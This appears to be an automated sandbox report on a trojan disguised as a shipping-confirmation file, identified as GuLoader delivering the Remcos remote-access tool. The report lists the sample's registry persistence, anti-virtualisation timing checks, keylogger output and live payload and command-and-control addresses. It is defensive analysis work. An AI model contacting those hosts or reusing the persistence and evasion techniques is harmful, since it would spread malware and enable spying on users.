Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Section loaded: winmm.dll	Jump to behavior

Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe

File written: C:\Users\user\AppData\Local\Temp\Setup.ini

Jump to behavior

Source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mshtml.pdb source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000001.2124649802.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source:	Binary string: mshtml.pdbUGP source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000001.2124649802.0000000000649000.00000020.00000001.01000000.00000007.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 00000000.00000002.2125848795.000000000316C000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2983718490.00000000016FC000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2125848795.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2983718490.0000000001660000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2125582739.00000000028CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\eftermodnendes\ringeagt\Garantis131.Sul, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\nsc44DF.tmp, type: DROPPED

Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe

Code function: 0_2_733B1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_733B1BFF

Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe

Code function: 0_2_733B30C0 push eax; ret

0_2_733B30EE

Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	File created: C:\Users\user\AppData\Local\Temp\nsx45AB.tmp\System.dll			Jump to dropped file
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	File created: C:\Users\user\AppData\Local\Temp\Feverish\Halvdelene.bat			Jump to dropped file

Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe

File created: C:\Users\user\AppData\Local\Temp\Feverish\Halvdelene.bat

Jump to dropped file

Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Snecks	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Snecks	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Snecks	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Snecks	Jump to behavior

Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	API/Special instruction interceptor: Address: 3A7B03F
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	API/Special instruction interceptor: Address: 200B03F

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	RDTSC instruction interceptor: First address: 3A4181B second address: 3A4181B instructions: 0x00000000 rdtsc 0x00000002 test cx, bx 0x00000005 test ax, 00001EA8h 0x00000009 cmp ebx, ecx 0x0000000b jc 00007FD4987EABFCh 0x0000000d cmp ch, ah 0x0000000f inc ebp 0x00000010 test di, 449Ah 0x00000015 inc ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	RDTSC instruction interceptor: First address: 1FD181B second address: 1FD181B instructions: 0x00000000 rdtsc 0x00000002 test cx, bx 0x00000005 test ax, 00001EA8h 0x00000009 cmp ebx, ecx 0x0000000b jc 00007FD498D1604Ch 0x0000000d cmp ch, ah 0x0000000f inc ebp 0x00000010 test di, 449Ah 0x00000015 inc ebx 0x00000016 rdtsc

Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Window / User API: threadDelayed 3431	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Window / User API: threadDelayed 2472	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Window / User API: threadDelayed 972	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Window / User API: foregroundWindowGot 1668	Jump to behavior

Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsx45AB.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe TID: 7704	Thread sleep count: 3431 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe TID: 7948	Thread sleep count: 2472 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe TID: 7948	Thread sleep time: -7416000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe TID: 7932	Thread sleep count: 114 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe TID: 7932	Thread sleep time: -114000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe TID: 7948	Thread sleep count: 972 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe TID: 7948	Thread sleep time: -2916000s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe

Thread sleep count: Count: 3431 delay: -5

Jump to behavior

Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Code function: 0_2_004069DF FindFirstFileW,FindClose,	0_2_004069DF
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Code function: 0_2_00405D8E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405D8E
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	Code function: 0_2_00402910 FindFirstFileW,	0_2_00402910

Source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000000.00000002.2125194668.00000000006CF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000002.2989862644.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8p
Source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000002.2989862644.0000000002D2E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	API call chain: ExitProcess graph end node			graph_0-4399
Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	API call chain: ExitProcess graph end node			graph_0-4404

Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe

Code function: 0_2_733B1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_733B1BFF

Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe

Process created: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe "C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe"

Jump to behavior

Source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000002.2989862644.0000000002CD0000.00000004.00000020.00020000.00000000.sdmp, Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000002.2989862644.0000000002D43000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerG
Source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000002.2989862644.0000000002D43000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerIG\
Source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000002.2989862644.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000002.2989862644.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp, logs.dat.4.dr	Binary or memory string: [Program Manager]

Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe

0_2_00403645

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 00000004.00000002.2989862644.0000000002D18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2989862644.0000000002D43000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe PID: 7700, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

Remote Access Functionality

Detected Remcos RAT

Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe

Mutex created: \Sessions\1\BaseNamedObjects\Rmc-0B1XIG

Jump to behavior

Yara detected Remcos RAT

Source: Yara match	File source: 00000004.00000002.2989862644.0000000002D18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2989862644.0000000002D43000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe PID: 7700, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 Registry Run Keys / Startup Folder	1 Access Token Manipulation	11 Masquerading	11 Input Capture	31 Security Software Discovery	Remote Services	11 Input Capture	11 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	12 Process Injection	2 Virtualization/Sandbox Evasion	LSASS Memory	2 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	1 Remote Access Software	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Registry Run Keys / Startup Folder	1 Access Token Manipulation	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	1 Clipboard Data	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	12 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	3 File and Directory Discovery	SSH	Keylogging	113 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	23 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	30%	Virustotal		Browse
Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe	61%	ReversingLabs	Win32.Trojan.Guloader

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\Feverish\Halvdelene.bat	61%	ReversingLabs	Win32.Trojan.Guloader
C:\Users\user\AppData\Local\Temp\nsx45AB.tmp\System.dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://teldrum.ro/NJrdZqNcCtz102.binL	0%	Avira URL Cloud	safe
https://teldrum.ro/NJrdZqNcCtz102.bin0x	0%	Avira URL Cloud	safe
https://teldrum.ro/NJrdZqNcCtz102.binA	0%	Avira URL Cloud	safe
https://teldrum.ro/NJrdZqNcCtz102.binHipssFricrestereamuschilor.ro/NJrdZqNcCtz102.bin	0%	Avira URL Cloud	safe
https://teldrum.ro/NJrdZqNcCtz102.bin	0%	Avira URL Cloud	safe
linktreewealth.zapto.org	0%	Avira URL Cloud	safe
https://teldrum.ro/	0%	Avira URL Cloud	safe
linktreewealthy.zapto.org	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
linktreewealth.zapto.org	0.0.0.0	true	false	high
teldrum.ro	109.99.162.14	true	false	high
linktreewealthy.zapto.org	0.0.0.0	true	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://teldrum.ro/NJrdZqNcCtz102.bin	false	Avira URL Cloud: safe	unknown
linktreewealth.zapto.org	true	Avira URL Cloud: safe	unknown
linktreewealthy.zapto.org	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000001.2124649802.00000000005F2000.00000020.00000001.01000000.00000007.sdmp	false		high
https://teldrum.ro/NJrdZqNcCtz102.binL	Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000002.2989862644.0000000002D18000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://teldrum.ro/NJrdZqNcCtz102.bin0x	Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000002.2989862644.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214	Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000001.2124649802.0000000000649000.00000020.00000001.01000000.00000007.sdmp	false		high
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd	Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000001.2124649802.00000000005F2000.00000020.00000001.01000000.00000007.sdmp	false		high
http://www.ftp.ftp://ftp.gopher.	Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000001.2124649802.0000000000649000.00000020.00000001.01000000.00000007.sdmp	false		high
https://teldrum.ro/NJrdZqNcCtz102.binA	Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000002.2989862644.0000000002D18000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, Halvdelene.bat.4.dr	false		high
https://teldrum.ro/NJrdZqNcCtz102.binHipssFricrestereamuschilor.ro/NJrdZqNcCtz102.bin	Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000002.2990368035.0000000002FA0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://teldrum.ro/	Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000002.2989862644.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
109.99.162.14	teldrum.ro	Romania		9050	RTDBucharestRomaniaRO	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1592408
Start date and time:	2025-01-16 05:09:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 21s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/10@3/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 84% Number of executed functions: 47 Number of non-executed functions: 34
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
04:10:52	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Snecks C:\Users\user\AppData\Local\Temp\Feverish\Halvdelene.bat
04:11:00	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Snecks C:\Users\user\AppData\Local\Temp\Feverish\Halvdelene.bat
23:11:28	API Interceptor	57271x Sleep call for process: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
109.99.162.14	oXcuapa8Nb	Get hash	malicious	GuLoader, Remcos	Browse
	2afvzKckLw	Get hash	malicious	GuLoader, Remcos	Browse
	inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Get hash	malicious	Remcos, GuLoader	Browse
	BppG5NgQJB	Get hash	malicious	GuLoader, Remcos	Browse
	x6yDsHJ9tr.exe	Get hash	malicious	Remcos, GuLoader	Browse
	LrBF2Z930N.exe	Get hash	malicious	Remcos, GuLoader	Browse
	2T10XBqS6g.exe	Get hash	malicious	Remcos, GuLoader	Browse
	DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe	Get hash	malicious	Remcos	Browse
	z58Swiftcopy_MT.bat.exe	Get hash	malicious	Remcos, GuLoader	Browse
	DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe	Get hash	malicious	Remcos, GuLoader	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
linktreewealth.zapto.org	inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Get hash	malicious	Remcos, GuLoader	Browse	0.0.0.0
	x6yDsHJ9tr.exe	Get hash	malicious	Remcos, GuLoader	Browse	43.226.229.209
	LrBF2Z930N.exe	Get hash	malicious	Remcos, GuLoader	Browse	43.226.229.209
	2T10XBqS6g.exe	Get hash	malicious	Remcos, GuLoader	Browse	43.226.229.209
teldrum.ro	oXcuapa8Nb	Get hash	malicious	GuLoader, Remcos	Browse	109.99.162.14
	2afvzKckLw	Get hash	malicious	GuLoader, Remcos	Browse	109.99.162.14
	inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Get hash	malicious	Remcos, GuLoader	Browse	109.99.162.14
	BppG5NgQJB	Get hash	malicious	GuLoader, Remcos	Browse	109.99.162.14
	x6yDsHJ9tr.exe	Get hash	malicious	Remcos, GuLoader	Browse	109.99.162.14
	LrBF2Z930N.exe	Get hash	malicious	Remcos, GuLoader	Browse	109.99.162.14
	2T10XBqS6g.exe	Get hash	malicious	Remcos, GuLoader	Browse	109.99.162.14
	DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe	Get hash	malicious	Remcos	Browse	109.99.162.14
	z58Swiftcopy_MT.bat.exe	Get hash	malicious	Remcos, GuLoader	Browse	109.99.162.14
	DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe	Get hash	malicious	Remcos, GuLoader	Browse	109.99.162.14

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
RTDBucharestRomaniaRO	boatnet.arm.elf	Get hash	malicious	Mirai, Gafgyt	Browse	80.97.224.164
	bot.ppc.elf	Get hash	malicious	Unknown	Browse	86.34.169.190
	i486.elf	Get hash	malicious	Mirai	Browse	109.99.197.55
	oXcuapa8Nb	Get hash	malicious	GuLoader, Remcos	Browse	109.99.162.14
	2afvzKckLw	Get hash	malicious	GuLoader, Remcos	Browse	109.99.162.14
	inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Get hash	malicious	Remcos, GuLoader	Browse	109.99.162.14
	ppc.elf	Get hash	malicious	Unknown	Browse	80.97.224.140
	BppG5NgQJB	Get hash	malicious	GuLoader, Remcos	Browse	109.99.162.14
	x6yDsHJ9tr.exe	Get hash	malicious	Remcos, GuLoader	Browse	109.99.162.14
	LrBF2Z930N.exe	Get hash	malicious	Remcos, GuLoader	Browse	109.99.162.14

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	153776434-874356550.05.exe	Get hash	malicious	Unknown	Browse	109.99.162.14
	download.bin.exe	Get hash	malicious	Njrat, XRed	Browse	109.99.162.14
	Handler.exe	Get hash	malicious	DanaBot, PureLog Stealer, Vidar	Browse	109.99.162.14
	BNXCXCJSD.jse	Get hash	malicious	MassLogger RAT	Browse	109.99.162.14
	setup.msi	Get hash	malicious	Unknown	Browse	109.99.162.14
	00.ps1	Get hash	malicious	PureCrypter, LummaC, LummaC Stealer	Browse	109.99.162.14
	00.ps1	Get hash	malicious	PureCrypter, LummaC, LummaC Stealer	Browse	109.99.162.14
	Inquiry.js	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	109.99.162.14
	138745635-72645747.116.exe	Get hash	malicious	Unknown	Browse	109.99.162.14

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsx45AB.tmp\System.dll	oXcuapa8Nb	Get hash	malicious	GuLoader, Remcos	Browse
	2afvzKckLw	Get hash	malicious	GuLoader, Remcos	Browse
	inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Get hash	malicious	Remcos, GuLoader	Browse
	BppG5NgQJB	Get hash	malicious	GuLoader, Remcos	Browse
	x6yDsHJ9tr.exe	Get hash	malicious	Remcos, GuLoader	Browse
	LrBF2Z930N.exe	Get hash	malicious	Remcos, GuLoader	Browse
	2T10XBqS6g.exe	Get hash	malicious	Remcos, GuLoader	Browse
	2T10XBqS6g.exe	Get hash	malicious	GuLoader	Browse
	2T10XBqS6g.exe	Get hash	malicious	GuLoader	Browse
	2T10XBqS6g.exe	Get hash	malicious	GuLoader	Browse

Created / dropped Files

C:\ProgramData\remcos\logs.dat

Download File

Process:	C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	216
Entropy (8bit):	3.3621035037924156
Encrypted:	false
SSDEEP:	3:rglsLlFmFM2Q55JWRal2Jl+7R0DAlBG45klovDl6ALilXIkqoojklovDl6v:MlsLlkCL55YcIeeDAlOWAAe5q1gWAv
MD5:	003C8B3F694F8D4F5064AF74919DCF90
SHA1:	293E37B882584AD1A71DF24C56E25643D985B517
SHA-256:	3E4F375E18FD840BC933AB921C0B846F00E6259BB6743BDC48CD745C98F8A06B
SHA-512:	9A85694D4022B11C6594D48155EF62A9152DF79438A0BCD4875D522060D9D55731762CC5AA2BC8C0C04932C0B42DD61039196711B7A5D86BE1C4D9588397970D
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
Reputation:	low
Preview:	....[.2.0.2.5./.0.1./.1.5. .2.3.:.1.0.:.5.6. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

C:\Users\user\AppData\Local\Temp\Feverish\Halvdelene.bat

Download File

Process:	C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	610289
Entropy (8bit):	7.753054968072418
Encrypted:	false
